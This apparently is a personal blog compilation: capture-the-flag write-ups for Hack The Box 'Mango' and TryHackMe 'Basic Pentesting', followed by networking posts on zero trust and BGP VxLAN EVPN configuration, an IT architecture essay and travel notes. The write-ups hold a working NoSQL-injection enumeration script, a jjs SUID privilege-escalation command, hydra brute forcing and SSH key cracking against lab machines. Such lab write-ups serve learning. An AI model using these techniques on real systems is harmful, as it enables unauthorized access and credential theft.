Hack The Box – Mango

Whilst I’m not going to post about all of the machines I try on hack the box, I’ll likely post about ones where I learnt something new, and this was an interesting one for me and took me a while to work through and think about.

I took some effort not to spoil it for myself as this is an older retired machine, but the name gives a hint that it is likely a MangoDB backend which is a noSQL database. I have some experience with basic authentication bypass, via manipulating operators in field values, such as $eq (equals), $ne (not equals).

When I checked the login page and saw the username=admin&password=admin&login=login I suspected I could attempt a simple password not equals inject to bypass the authentication process.

The response indicated that it was being processed by the backend, presumably a noSQL DB, but it redirected me to an error page, so I utilised burp to try a few other auth bypass attempts and to extract some data. It is also worth noting that the website utilises PHP which allows query string inputs into an array with brackets, thus PHP allows me to use [$regex] to search for a value in the DB.

I started by confirming this works by checking for a username starting with ‘a’ which is an obvious place to start but also I noted that admin was used in the website source as an email address.

Anyway luckily we got the expected response which is a 302.

Where a non match, which I got when repeating the test but with searching for a username starting with ‘b’ just respond with a 200.

At this point I suspect we can utilise this method to enumerate the username and potentially the password. I’m not a programmer and thus this was an interesting challenge. I did a bit more research on noSQL injection and it seemed pretty straight forward. Thus I started to write some code that would loop through the printable characters for the username, appending any that respond with a 302 with another go through the loop until we got a full username.

Therefore this is the code I wrote and run giving me the username of ‘admin’.

#!/usr/bin/env python3

import requests
import re
import string

url = 'http://staging-order.mango.htb/'
done = False
username = ""
password = ""

while not done:
    done = True
    for c in string.printable:
        data = {
            "username[$regex]": f"^{re.escape(username+c)}.*$",
            "password[$ne]": "admin",
            "login": "login"
        }
        r = requests.post(url, data=data, verify=False, allow_redirects=False)
        if r.status_code == 302:
            done = False
            username += c
            print(f"{c}")
print(f"Username: {username}")

However I’d need to extend this code so it would keep looking for additional usernames starting with other characters and then switch to checking for passwords against those usernames. I’m confident with enough time I could get this working and I still plan to do so but it would likely take me some time and I wanted to own this machine… Thus after a quick search I found the code that does just this which can be found here: https://book.hacktricks.xyz/pentesting-web/nosql-injection

After running this code (it does take a while) I get the following output showing an ‘admin’ and ‘mango’ user both with enumerated passwords.

As nmap showed that ssh was listening I tried connecting to the target with the admin account but that did not work. Trying with mango gave me access as the user mango.

Note: I always try and have something running in the background looking for other information or potential ways of exploit. To this effect I was running gobuster but it didn’t really come up with much of interest.

Once I am on the target I usually do a few things such as check /etc/passwd to see what users are available and potentially any that may have privileges, I also test ‘sudo -l ‘ to check if the user can run any command with elevated privileges. Whilst I saw the admin account in /etc/passwd nothing else stood out so I next search for files with SUID set, using the command

find / -perm -4000 2>/dev/null

This finds a few interesting files but the one that stands out to me is “/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs” which I know is an old java command line tool to interpret scripts or run an interactive shell.

I also want to upload and run linpeas.sh so I start a basic http server on my local machine via the command python3 -m http.server 80 and then utilise wget on the target to fetch linpeas.sh. Once this is run and after checking through the output it confirms that the ‘jjs’ command is a good candidate.

Prior to continuing I look for the user flag and as it is not in mango’s home directory I change to the other account I found earlier ‘admin’ via the command su – admin and here I find the user flag.

Time to check GTFOBins for a way to leverage ‘jjs’ to escalate my privileges. Using one of the examples I find which I slightly modify to set the SUID of bash so I can then run bash and elevate my access. I run the command jjs and then run:

Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()

Which sets the SUID bit on the bash command which I can then run as the user with /bin/bash -p to gain a escalated bash prompt. From here it is a simple matter to get the root flag in the /root directory.

Final Thoughts

I really enjoyed this machine, especially gaining the user access as it required some noSQL injection, which I’ve only basic experience in, as SQL DB’s are more common in my experience, and also having to write some code to automate the enumeration.

This later was very interesting to me as I have not done a lot of coding since university and am trying to practice more python coding when I get the chance, which is not often. The root access was a little simple but that is typically the case once user level foothold is gained on the target.

The video of my attempt at this machine can be found here: https://youtu.be/q8gVAEWn2vg

Zero Trust Network – Hype Cycle?

As the hype cycle of artificial intelligence and machine learning start to wane a new contender for the marketecture focus has emerged. Well it has been around for many years but is getting a lot more attention recently, were almost all the network and security vendors typically have it, or a reference to it, on their front page… That is of course ‘zero trust’.

I for one welcome the focus on zero trust, even though it is somewhat a misnomer, but more on that later, as it helps direct focus on an area of network security that I think has been a struggle for a long time. It has been part of network security, albeit in more niche areas for many years, mainly when working with wireless deployments where mobility of the user is inherent and thus network location cannot be relied upon to provide a comprehensive security posture. Typically this was part of a mobility strategy where the user’s or system’s identity formed the basis of how security posture and controls where applied.

Fast forward 5-10 years and with the increasing adoption of public cloud which has further eroded or at least stretched and evolved the normal boundaries of a network, a more holistic approach to leveraging identity for network controls and access is gaining momentum.

Therefore when I discuss the meaning of Zero Trust I consider treating every connection the same as a foundation, that is, every connection has no implied trust or untrust, enabling the right access to the right destination at the right time. The benefit of this is that being “off-net” is no longer an inhibitor and security controls can be proactively extended to all applications. It is key to understand that zero trust is not a product, technology, standard, pattern or process but rather a principle that spans all technology domains.

Additionally, contrary to many vendor and industry marketing, the perimeter did not disappear, and trust is no longer required, but rather how trust is leveraged and considered is now another tool in the tool belt, where trust is assigned more based on the identity, posture and requirements of an entity, rather than inherited due to location or connectivity medium. It is still important to understanding the boundaries of the network to enable an enhanced definition of policies for users and resources, and the criteria to log, monitor and inspect activities within these boundaries with further understanding of expected behaviors provided by micro-segmentation and identity. It is important to understand that a zero trust implementation is a marathon not a sprint, allowing focus on the greatest risks and iterate over time. In the network it is also important to not try and attempt to control every connection, especially early on, but rather work towards grouping connectivity based on identity and segmentation enabling the controls to remain at the edge of the segment but leveraging the richer information provided by identity, visibility and logging within the network to make more informed security and control decisions.

Once the identity of an entity which is required to establish a connection is known, a control can authenticate and authorize the connection to the destination based on a policy. For example a firewall could block all traffic to an application by default, however based on its verified knowledge of the identity of the entity trying to establish the connection it could allow that connection to pass, this can be extended to specific destinations and to specific times, all defined in a policy, regardless of the entities location.

An important capability for a Zero Trust approach is not just to enable conditional access, but to also ensure that access is secure, by preventing exploits, vulnerabilities, and other attacks, which requires both a clear understanding of what should or should not be traversing the network but also visibility to measure, learn and adapt, which means that the network controls can no longer focus just on layer 4, whilst this is still important, but also needs better insight into layer 7.

Conceptually the steps an organisation needs to undertake to adopt a zero trust approach is to define the landscape which zero trust will be applied, the ability to identify the users, map that identity to the access they are authorised for, distribute the policy to the controls which will enforce the access and monitor the connection to ensure it maintains compliance with the policy. This is an iterative process and can be represented as follows:

To enable the adoption of a zero trust approach, the network, meaning the traffic traversing the network and the devices enabling the network, need to be able to support identity based controls, the ability to segment or isolate and remove any undesired or compromised component or traffic flow on demand.

Underpinning the ability to define the landscape is a micro-segmentation approach in the network where workloads are segmented based on security, support and operational requirements, with well defined zones for administration activities and shared services, which not only allows simplification of controls but also aids in visibility of compromised or mis-configured components.

Final Thoughts

As I mentioned at the start of this thought dump, zero trust is often misunderstood or misportrayed as no entity, be it user, application or system, should have zero trust, but trust is required, perhaps you need to trust your identity store or the links utilised to connect components, but rather that trust should not be implied without better consideration of what, how and why a connection is required. This is likely a long journey which cannot be completed with the purchase or implementation of a technology, but rather by adopting both a micro-segmentation approach, which allows for policies to be tailored to network zones and the expected behaviors and capabilities within those zones and with identifying the requestor of connections along with who or what is making the request.

Whilst the zero trust question cannot be solved with technology alone, it also requires a new approach and new way of thinking, acknowledging that most connectivity will originate from, or be destined to, an entity outside of the organisations network, be it administrators working from home, or applications deployed to a platform as a Service (PaaS), all with the goal of providing the least amount of access required for a user or function to accomplish a specific task.

To realise this zero trust approach the network controls need to incorporate identity information to make decision about what access to resources is enabled and what the user is authorised to do in a dynamic and automated way, along with uplifting the ways of working to leverage these capabilities.

Therefore the best place to start a zero trust journey is with the way you think about security and the mindset of applying controls, expanding the focus from the deeply ingrained network centric based approached to a more holistic view understanding what is actually required. Also trying to do this without an underpinning of network automation will likely lead to lax or overbearing controls.

TryHackMe – Basic PenTest

A long long time ago in a country far far away I worked briefly in a CyberSecurity organisation that performed pentesting and auditing. My main area of focus was network and network security, thus looking at network reachability, exposure, routing, and auditing (and hardening) network infrastructure, mainly Cisco routers, switches and firewalls.

I’ve focused more on the network side of architecture for the last decade after doing some time as a network security domain architect, so when I came across tryhackme and hack the box I was pretty excited to delve back into it.

I thought I’d start off with something pretty easy and thus what follows is my write up and experience. I’ll likely post a few more writeups as I do more machines as I mostly use this as a place to reflect and capture some of my experience, therefore this is likely not the best or most efficient example of how to pwn these machines, but that is not the point… it is to have some fun and hopefully learn (and dust off) some new skills along the way.

I decided to start off with the ‘room’ called Basic Pentesting which utilises:

  • service enumeration
  • brute forcing
  • hash cracking
  • Linux enumeration

I’ve tried to provide some of the more interesting screen shots but also provided the video if anyone wants to watch me stumble through it.

I typically start of with a NMAP scan:

My typical nmap command variables are:

-sV: Probe open ports to determine service/version info

-sC: equivalent to –script=default

These are typically not to slow and provide a good amount of data to progress with. I normally also use -v so I can see the output in progress for a full command of:

nmap -sC -sV -v -oN <output file> <ip address>

Whilst that is running I’ll check out if the target is running a web service, and look at the html code to see if there is anything obvious or if I can see what languages are being used. The site listed as under maintenance but the source had a comment to check the ‘dev notes section’. I could start busting directories with gobuster or dirbuster but decide to just try some manual directories and after a few tried find the /development directory which has a few notes providing a clue to two users J and K and also that J is using a weak password.

I also note that SMB is running from my nmap scan and as nmap indicated the server was Ubuntu decide to run enum4linux. This is probably a good place to point out that as this is a for purpose ‘hack’ box I’m not worried about being noisy, but in a real world pentest one would typically try and be more stealthy and mask some of the scans and enumeration. Enum4linux shows that SMB has ‘Anonymous’ access enabled so I connect via the command: smbclient //<IP address>/Anonymous and find a text file that provides the users name of ‘Jay’ and ‘Kay’.

I already know that Jay’s using a weak password so it is a good opportunity to try and brute force the password, which I do with hydra, using the command:

hydra -l jan -p <password list> ssh://<IP address>

As you can see I utilised ‘jan’ as the user and ‘rockyou.txt’ as the trusty password list and after a few moments managed to brute force the password. Now having Jan’s password and knowing that SSH is listening from the NMAP scan I connect using Jan’s credentials.

I poke around a bit but decide to upload linpeas which is a great Local Linux Privilege Escalation checklist script. This shows that Kay’s private key is readable from Jan’s access so I grab Kay’s SSH private key ‘id_rsa’.

I first attempt to connect using Kay’s SSH key but it is protected with a passphrase.

It is now time to try and crack Kay’s private key with John the Ripper. I first convert the private key into a format for use with JtR, using ‘ssh2john’ and then get to cracking. I manage to crack Kay’s SSH key with the command:

john <Kay's ssh key> <password list>

Once we have cracked the passphrase we can use Kay’s SSH key and the cracked passphrase to SSH into the target as Kay using these credentials, which enables me to find the final flag for this room.

Final Thoughts

This was a great way to get back into the groove as whilst it was simple it did utilise a few different techniques to achieve the goal of obtaining access to the target. There are a few other methods that I would potentially try if doing this again as whilst this room is easily achieved with tools or scripts there are more manual methods that could achieve the same outcome, but hey why reinvent the wheel…

I really think that regardless of your level or experience these hacking sites are a great way to improve your skills but perhaps more importantly provide some insight into how to consider deploying and managing your own network, specifically hwo they can be protected, be it at home or for the organisation you work for.

As mentioned this room was basic and didn’t require any new or not already established vulnerability, but as a lot of people in the IT industry know, most breaches are via know and published vulnerabilities and exploits, but further to that it also leans into how technology is connected and security really is only as strong as the weakest link.

Addendum: As I have started playing around more with tryhackme and hackthebox, I’ve come across many great experts in the community that provide a much more detailed, correct and entertaining view into cybersecurity and I’d like to shout out to some of my favorites, being John Hammond and IppSec. I recommend you search them up on youtube as they have a lot of great content!

Update 12/07/21: I recently re-did this room so I could record it and provide a link here: https://youtu.be/pFnSCaN4kGA

BGP VxLAN EVPN – Part 2: Underlay

In the previous post, found here I provided an overview of  BGP VxLAN EVPN and mentioned that various IGP’s could be utilised to provide the underlay. In this post I am going to flesh out what a potential underlay setup may look like based on OSPFv2.
There are some initial considerations which need to be defined when planning the underlay design. Some of these considerations are:
  • MTU
  • Unicast Routing Protocol
  • IP addressing
  • Multicast for BUM traffic replication

VxLAN adds 50 Bytes to the original Ethernet frame which needs to be catered for to avoid fragmentation. The simplest way of doing this is to enable Jumbo frames in the IP network where VxLAN will run. As most servers utilise a jumbo frame of 9000 it is recommended that the switches be configured with a Jumbo frame of 9192 / 9216 depending on what the model of hardware supports. This will cater for the servers 9000 plus the VxLAN overhead.

The next consideration is which IGP (unicast routing protocol) to utilise, however as mentioned this post will focus on OSPF.

IP addressing for the underlay needs to cater for the P2P links between the spine and leaf switches, the loopback interfaces on each spine and leaf switch and the multicast Rendezvous-Point (RP) address.

Whilst discussed in more detail later in this post it should be noted that the mode of multicast utilised will likely depend on the model of hardware which is being utilised. For example on the Cisco Nexus range, unfortunately, not all Nexus models support the same multicast mode. Below is a list of what is supported on each Nexus model:

  • Nexus 1000v – IGMP v2/v3
  • Nexus 3000 – PIM ASM
  • Nexus 5600 – PIM BiDir
  • Nexus 7000/F3 – PIM ASM / PIM BiDir
  • Nexus 9000 – PIM ASM

In this example we will leverage the loopback address for our multicast RP address, however as an example for a medium sized spine and leaf deployment utilising 4 spine switches and 20 leaf switches the following IP address usage needs to be considered:

  • 4 Spine x 20 leaf = 80 P2P Links
  • 80 links, with an IP address at each end = 160 P2P IP addresses
  • 24 devices in total = 24 Lookpack IP addresses.
  • Total = 160 P2P IP + 24 Loopback IP = 184 IP Addresses

Also note that to conserve IP addresses, ‘IP unnumbered loopback 0’ for the P2P interfaces, may be used, which means 1 IP address per device. This should be seriously considered for large deployment, however for simplicity in this example I am going to utilise 2 Spine switches and 3 Leaf switches and thus a unique IP address everywhere, meaning I need to cater for:

2 Spine x 3 leaf = 6 P2P links x 2 = 12 P2P IP addresses + 6 Loopback IP addresses.

Also I am going to assume that in this example that the servers are utilising the 10/8 IP address range, and thus I have opted to use the 192.168/16 range for the Loopback interfaces which are also used as the Router ID and 172.16/12 IP address range for the physical layer 3 P2P interfaces.

Also for reference whilst most of the thoery is independant of the vendor and hardware in this example I am using Cisco Nexus 9000 switches to implement this network technology, and as with all Nexus switches the features first need to be enabled, thus I have enabled the following:

Spine-1#show run | incl feature
feature nxapi
feature ospf
feature bgp
feature pim
feature interface-vlan
feature vn-segment-vlan-based
feature lacp
feature lldp
feature nv overlay
As the spine switches are the simplest to configure I’ll start there with the first spine switch. As mentioned, depending on how MAC address replication and flooding is configured in the environment multicast may be required. I’ll explain this in more detail later, but in this example I have enabled multicast and also nominated this spine switch as one of the RP, with the following commands.
ip pim rp-address 192.168.1.0
ip pim anycast-rp 192.168.1.0 192.168.1.1
ip pim anycast-rp 192.168.1.0 192.168.1.2
Once this is done the next step is to enable the underlay routing protocol. As I am using OSPF to provide IP reachability across the fabric, the first step is to configure the loopback interface which will be used as the router ID for the routing protocol, and then configure OSPF itself.

interface loopback0
description Router-ID – Spine1
ip address 192.168.1.1/32

router ospf UNDERLAY
router-id 192.168.1.1
log-adjacency-changes
maximum-paths 12
auto-cost reference-bandwidth 100000 Mbps
passive-interface default

The router-id is the IP I will use for the loopback0 interface and for all router-id’s defined on this switch.

The OSPF configuration is standard and should be familiar to anyone who has configured OSPF before, however the command ‘maximum paths’ may not be. This is enabled to provide Equal Cost Multi-Pathing between my leaf and spine switches. I chosen 12 just to have a large number and likely never need to worry about it again, but as long as this is equal to, or greater than, the amount of physical links it will be fine. Also it is always good practice to define the reference bandwidth, and in this example I have configured 100000 Mbps which is 100 Gbps and should cater for the largest link this environment will have. Also I prefer to manually nominate any interfaces I wish to participate in OSPF thus I have configured the interfaces to be passive by default.

TIP: By default OSPF is uses broadcast for message propergation and election, however we want to utilise the Network type P2P thus, ensure that ‘ip ospf network point-to-point’ on loopback and P2P interfaces is configured.

Once this is done I can go back into the loopback interface and assign the OSPF and Mulicast parameters so the loopback interface participates in these protocols, with the following configuration:

interface loopback0
  description Router-ID – Spine1
  ip address 192.168.1.1/32
  ip ospf network point-to-point
  ip router ospf UNDERLAY area 0.0.0.0
  ip pim sparse-mode
The next step is to configure the point to point interfaces and enable OSPF and Multicast. As we are using VxLAN we are going to increase the MTU to cater for the additional header size. Technically only an additional 50 bytes is required but for simplicity I’ve decided to enable jumbo frames and set the mtu to 9216 on all physical interfaces.
interface Ethernet1/43
  description – DC01-LSL06-03 [Eth1/47]
  mtu 9216
  ip address 172.16.1.1/30
  ip ospf network point-to-point
  no ip ospf passive-interface
  ip router ospf UNDERLAY area 0.0.0.0
  ip pim sparse-mode
  no shutdown

Its important to configure OSPF as point to point here to ensure there is no DR/BDR and thus no election as well as being a more optimised LSA database, and avoiding a full SPF calculation for a link failure.  Also as we have nominated passive-interface default in OSPF we need to enable this interface to participate in OSPF with the command ‘no ip ospf passive-interface’. I have also used a /30 for the point to point link which is not ideal for preserving IP address space and may cause scale issues in a very large deployment but for simplicity of configuration and troubleshooting I’ve decided the trade of here is fine.

All the interconnects between the leaf and spine switches are via 2 x 10G interfaces thus I need to replicate the above configuration on an additional interface as per the following configuration.

interface Ethernet1/44
  description – DC01-LSL06-03 [Eth1/48]
  mtu 9216
  ip address 172.16.1.5/30
  ip ospf network point-to-point
  no ip ospf passive-interface
  ip router ospf UNDERLAY area 0.0.0.0
  ip pim sparse-mode
  no shutdown
This should be repeated for all links between each spine and leaf adjusting the IP addresses as required until all of your switches form a neighbor relationship as shown here:
Spine-1# show ip ospf neighbors
 OSPF Process ID UNDERLAY VRF default
 Total number of neighbors: 6
 Neighbor ID     Pri State            Up Time  Address         Interface
 192.168.1.13      1 FULL/ –          1w5d     172.16.1.2      Eth1/43
 192.168.1.13      1 FULL/ –          1w5d     172.16.1.6      Eth1/44
 192.168.1.12      1 FULL/ –          1w5d     172.16.1.10     Eth1/45
 192.168.1.12      1 FULL/ –          1w5d     172.16.1.14     Eth1/46
 192.168.1.11      1 FULL/ –          1w5d     172.16.1.18     Eth1/47
 192.168.1.11      1 FULL/ –          1w5d     172.16.1.22     Eth1/48
Also as we enabled multicast PIM earlier, to confirm this has formed the appropriate neighbor relationships we use the following command:
Spine-1# show ip pim neighbor
PIM Neighbor Status for VRF “default”
Neighbor        Interface            Uptime    Expires   DR       Bidir-  BFD
                                                         Priority Capable State
172.16.1.2      Ethernet1/43         1w5d      00:01:42  1        yes     n/a
172.16.1.6      Ethernet1/44         1w5d      00:01:35  1        yes     n/a
172.16.1.10     Ethernet1/45         1w5d      00:01:26  1        yes     n/a
172.16.1.14     Ethernet1/46         1w5d      00:01:23  1        yes     n/a
172.16.1.18     Ethernet1/47         1w5d      00:01:34  1        yes     n/a
172.16.1.22     Ethernet1/48         1w5d      00:01:44  1        yes     n/a
Spine-1# show ip pim interface brief
PIM Interface Status for VRF “default”
Interface            IP Address      PIM DR Address  Neighbor  Border
                                                     Count     Interface
Ethernet1/43         172.16.1.1      172.16.1.2      1         no
Ethernet1/44         172.16.1.5      172.16.1.6      1         no
Ethernet1/45         172.16.1.9      172.16.1.10     1         no
Ethernet1/46         172.16.1.13     172.16.1.14     1         no
Ethernet1/47         172.16.1.17     172.16.1.18     1         no
Ethernet1/48         172.16.1.21     172.16.1.22     1         no
loopback0            192.168.1.1     192.168.1.1     0         no

Note: As this example is from the spine switch and each spine has 2 x 10G links to the 3 x leaf switches, there are 6 entries plus the loopback (depending on which command used) above.

This now has formed the underlay network with OSPF and Multicast and we can now build the overlay and control plane network above this. It is critical that reachability of the underlay is consistent across the fabric and this may be a good point to test failure scenarios for the underlay. It is a good point however to finish this blog, with the next providing the overlay and control plane configuration details.

 

BGP VxLAN EVPN – Part 1: Overview

This post focuses on BGP VxLAN EVPN and thus an understanding of BGP and VxLAN is very helpful to understand this topic. Additionally EVPN and VxLAN are considered overlay technologies which run over an underlay IP fabric. In this context the underlay fabric’s purpose is to provide reachability between VTEP’s.

Whilst outside the focus of this post, the main choices for the underlay are OSPF or IS-IS. There are pros and cons to each option, with OSPFv2 being very well understood by most engineers and simple to deploy, however it does not support IPv6 and thus OSPFv3 would be required for IPv6 support which is still not mature in vendor implementations. Alternatively IS-IS has supported both IPv4 and IPv6 for many years and is well supported by vendors but is not well understood by many engineers outside of Telcos. Note: BGP can also be used as the underlay but as it is also utilised in the overlay this can cause confusion and complexity. Utilising BGP for the underlay is fine however I would recommend doing your own research regarding the underlay protocol to use taking into account the engineer’s skills who will be deploying and supporting the fabric.

In summary VxLAN is a tunneling mechanism which takes layer 2 frames or a layer 3 packet, and encapsulates it with an IP header and routes it to a VxLAN Virtual Tunnel End Point (VTEP) for decapsulation; It effectively encapsulates an MAC address inside an IP packet.

Similar to VLANs which have a 12-bit field specifying the VLAN to which the frame belongs, for a total of 4096 VLAN tags, VxLAN header includes a 24-bit field called VxLAN Network Identifier (VNI), which allows up to 16 million layer 2 domains.

VXLAN uses by default the flood-and-learn behavior of the multicast control plane, which is fine for small deployments but does have salability limitations in large deployments. Another method is ingress Head End Replication (HER), which does not require multicast but is still a flood-and-learn data plane procedure. There are also some controller based solutions but these are outside the scope of this discussion.

To resolve the scaling limitation of the flood-and-learn approach Ethernet VPN (EVPN) control plane was created, utilizing a new address family in Multi-Protocol BGP (MP-BGP) to distribute the layer 2 and layer 3 host reachability information. Therefore Multi-Protocol Border Gateway Protocol (MP-BGP) was extended to utilise the Network Layer Reachability Information (NLRI) to carry both Layer 2 MAC and Layer 3 IP information at the same time, and this is called EVPN – Ethernet Virtual Private Network.  It also offers a range of other benefits such as reduction of data center traffic through ARP suppression.

Utilising BGP as the control plane for VxLAN enables capabilities such as MAC address learning and VRF multi-tenancy while providing optimized equal-cost multi-pathing (ECMP). The new BGP address family in Multi-Protocol BGP is utilised to exchange Network Layer Reachability Information (NLRI) via a series of route types. Of these route types, the two most applicable for this discussion are:

Type 2 – Host MAC and IP addresses (MAC-VRF)
Type 5 – IP Prefix information (IP-VRF)

Type-2 routes (RT-2) are utilised to advertise an end host’s MAC and IP address within the VLAN over an IP network. A VxLAN Network Identifier (VNI) is mapped to a VLAN and all VTEP’s (typically leaf switches) within the VNI utilise RT-2 to share and learn the end host’s MAC addresses to provide Layer 2 reachability.

Type-5 routes (RT-5) are utilised to advertise IP prefixes. A VXLAN Network Identifier (VNI) is mapped to a Virtual Routing & Forwarding (VRF) which identifies a tenant within the fabric, allowing for multitenancy and route tables to coexist.

The advertisement of the type 5 EVPN attribute will provide the NLRI between subnets and routing contexts, allowing for learning of prefixes (not MACs) that are advertised across different VRFs in the fabric. This means the fabric can provide end-to-end segmentation without being aware of the segmentation itself. For example, a VRF context can be created on a pair of Leaf switches and be extended to some other pair of Leaf switches without the devices in between being aware of the VRFs. With EVPN, only the leaf switches need to possess the VRFs which endpoints are attached to, allowing the Spine switches to simply provide transit between Leafs.

There are two models to provide inter-subnet routing with EVPN, which are asymmetric integrated routing and bridging (IRB) and symmetric IRB. The main difference between the asymmetric IRB model and symmetric IRB model is how and where the routing lookup is done, which results in differences concerning which VNI the packet travels on through the infrastructure.

The asymmetric model allows routing and bridging on the VXLAN tunnel ingress, but only bridging on the egress. This results in bi-directional VXLAN traffic traveling on different VNIs in each direction (always the destination VNI) across the routed infrastructure

The symmetric model routes and bridges on both the ingress and the egress leafs. This results in bi-directional traffic being able to travel on the same VNI, hence the symmetric name. However, a new specialty transit VNI is used for all routed VXLAN traffic, called the L3VNI. All traffic that needs to be routed will be routed onto the L3VNI, tunneled across the layer 3 Infrastructure, routed off the L3VNI to the appropriate VLAN and ultimately bridged to the destination.

Depending on the vendor hardware the topic of asymmetric or symmetric model may not be of concern as some hardware only supports one model and thus you will need to configure the fabric based on that limitation.

Generally, if you configure all VLANs/Subnets/VNIs on all leafs anyway then the asymmetric model is fine and may be simpler to configure as it doesn’t require extra VNIs.

If your VLANs/Subnets/VNIs are widely dispersed and/or provisioned on the fly, then the symmetric model is better and all routed traffic will use a transit VNI (L3VNI), while bridged traffic will use L2VNI.

NOTE: The symmetric model is what Cisco utilises and supports.

This should provide an overview of EVPN, and I’ll delve into more technical detail and configuration in subsequent posts.

Oki Life

I’ve been living on this beautiful island called Okinawa for 1 year now. It has been one of the most challenging choices I’ve made to move to a country that I do not know the language or the culture, but luckily for me the locals are very friendly, tolerant, and patient, and often understand english.

Looking back over my time here, I regret not making more of an effort to learn the language, something I plan to address very soon, but I’ve also learnt a lot about Japan, and Okinawa and the people that make this place so enchanting.

This post is just to share some of the photos of Okinawa, which capture my time here and also to assist me in reflecting on the allure of this island.

 

These represent but a fraction of my experience here, but are all windows to times I’ve felt happy, wonder and at peace.

I’m not sure how long I’ll be here or where I may go next but these photos remind me that beauty can be found everywhere and anywhere, you just have to open your eyes to it.

I expect that I’ll pause here a while longer, as I may not have gone where I intended to go, but I think I have ended up where I needed to be.

To Architect or Design, that is the question?

In IT, there are various roles such as Architect or Designer and the line between these two definitions seem to get blurred. I find that it often means different things for different people and companies. This can also make understanding a potential candidates strengths hard as there is no clear formal definition, so whilst a person might have the title of network designer, that person may be performing more of a network architecture function, and vise versa.

In the IT industry the term designer and architect largely follow the broader known definitions used in other industries, but unlike other industries which may have very clear descriptions, in IT these are often used interchangeably. However I believe there is a significant difference between the two which, based on my own experience I will try to discuss here, and maybe provide some insight, and perspective. I also think both skills are critical to a successful IT department in any mid to large size organisation.

ISO/IEC 42010:20076 defines “architecture” as: “The fundamental organization of a system, embodied in its components, their relationships to each other and the environment, and the principles governing its design and evolution.”

TOGAF embraces, but does not strictly adheres to ISO/IEC 42010:2007 terminology. In TOGAF, (based on my 9.1 certification and knowledge) “architecture” has two meanings depending upon the context:

  • A formal description of a system, or a detailed plan of the system at a component level to guide its implementation.
  • The structure of components, their inter-relationships, and the principles and guidelines governing their design and evolution over time.

My thoughts on the role of an architect is to optimize, the often fragmented legacy processes, technologies and capabilities, which is responsive to change and enables the delivery of the business strategy. It enables the effective utilisation of information and technology to assist the business in achieving a competitive advantage, and enhancing the user experience both internal and external to the business.

IT architecture focuses is on the broader, holistic view on how systems inter operate with each other and the principles that they should adhere too. It typically defines the choice of framework, capabilities, scope, goals, and high level methodologies which will be utilised.

IT designers focus is to plan for how the systems will be organised, how the components of a system will work and integrate, how the system will be implemented and the specification which should be met during, and at the end of the implementation and or integration.

Whilst these may seem in large part like the same thing I believe IT architecture is more objective focused, analyzing the requirements, the system and how it will be measured, whilst design is more subjective, as it is based more on the usage of a system, and how it will operate and be managed.

Simply put IT architecture often involves looking at all the features, from a business and IT perspective, how they inter relate, the inputs and outputs of how the system will be supported or utilised and the broader implications to the business as a whole. Design is typically more focused on the system itself, and its technical aspects, features and constraints.

That said, as mentioned, both skills are important as an architect may focus on the overall aesthetics of the system and the integration with the business a designer is typically looking for the purest technical solution. Architecture faces towards strategy, structure and the abstract. Design faces towards implementation and practice, towards the concrete. Therefore when combined a design defines how a chosen architecture is applied to the given requirements.

Architecture without design does nothing: it can too easily remain stuck in an ‘ivory-tower’ world, seeking ever finer and more idealized abstractions and solutions with the risk at realizing practical outcomes .

Design without architecture tends toward point-solutions that are optimized solely for a single task and context, often developed only for the current techniques and technologies, and often with high levels of hidden ‘technical debt’.

Having skills in both disciplines can sometimes be challenging but for effective and efficient IT in a mid to large size organisation, both architecture and design are essential to arrive at appropriate, useful, maintainable solutions when both are in use and in appropriate balance.

Final Thoughts

I have worked from a technician to designer to solution architect to domain architect and seen the benefits and limitations of all of these roles. I believe, perhaps slightly egocentricity, that having experience in all areas help round out what is needed for the organisation. Whilst in large organisations these roles are typically filled by different people or groups they can be a single person or group.

Whilst it is often important to deliver to the goals and objective of a specific project, being able to ensure this aligns with the organisation’s overall strategy and leaves minimal tech debt (gap) is more ideal. I have briefly discussed this in a previous post IT Architecture Process

I guess the answer is that both Architecture and Design are important, one may be more so depending on the situation, and they are often not disparate skills, however more focus or weight can be applied to one area over the other, it really depends on what problem is trying to be solved.

The land of Elves and Vikings

It has been a long while since I posted anything. What can I say, life got busy.

I’ve moved to another country for work. Whilst this is not the first time I’ve worked in another country it is the first where I’ve not had a firm end date in mind. Also to make it even more scary its a country where I don’t speak the language, so no idea how that is going to work out. but audentes Fortuna iuvat…

Anyway as I read over some of my previous posts, cringing from the horrendous grammar and punctuation, the OCD part of me wanted to re write it all. But the lazy, don’t give a crap part of me, as often does, won out and I’ve decided to accept my ineptitude.

As I considered what to write next as I have dozens of half formed posts, I realised much of them are about IT or wine and not many are about books or travel which are some of my other interests. I think I generally shy away from these topics as they reveal me more and I’m just a shy guy.

But riding on the courage of my recent move to another country I’ve decided to post a bit more about travel and my experiences and of course about some of the wine, whiskey and sake I’ve enjoyed along the way.

These posts will be in no chronological order, as again I am too lazy thus will start with a recent trip I made to the land of ice, which turned out to be very green.

Iceland
I spent a week in Iceland and I must admit, it is like no other place I have ever been. Although to be honest this is my 2nd time to Iceland the first was spent in a hotel and office with brief but exhilarating car rides between, thus I feel that first trip does not count.

Iceland was cold, no surprise there, but what is perhaps a little surprising is the lack of ice. The country (admittedly the half I saw) is covered, in most part, by bright green moss, which grows fervently over the volcanic rocks.

Much like this:
20170928_130739_HDR

It is bad form to walk on the moss as this be the domain of elves, but otherwise it is occasionally used from flavoring in alcoholic beverages to an ingredient in bread, medicine, skin care or in an emergency as a food source.

I didn’t try it myself in its purest form but many products in Iceland contain it.

Another noticeable thing about Iceland are the waterfalls. They are dotted around the country in many forms and shapes, but all hold some wonder, like where does all that water come from? errr maybe the gigantic glaciers as seen in the background in the above photo, perhaps?.

pixlr

The capital and largest city of Iceland is Reykjavík, which is as colourful as it’s inhabitants.

20170930_104912_HDR-2

Whilst the climate is much to cold to grow vines and produce wine, it is not too cold to produce beer which tends to be adorned with some visage of the Icelandic’s proud (if you don’t think to deeply about it) heritage of vikings.

This beverage is enhanced with what turned out to be a local favorite cuisine, otherwise known and hotdogs. But I must admit these are not quiet like any other hotdog I’ve had elsewhere and are very good.

pixlr (1)

When I had my fill of the local beer and enough to eat I took a nice stroll along one of the amazing beaches, made of black sand (volcanic sand) where I finally came across some ice, perhaps not exactly where I had expected to find it, but it was nonetheless beautiful.

20170928_102240_HDR

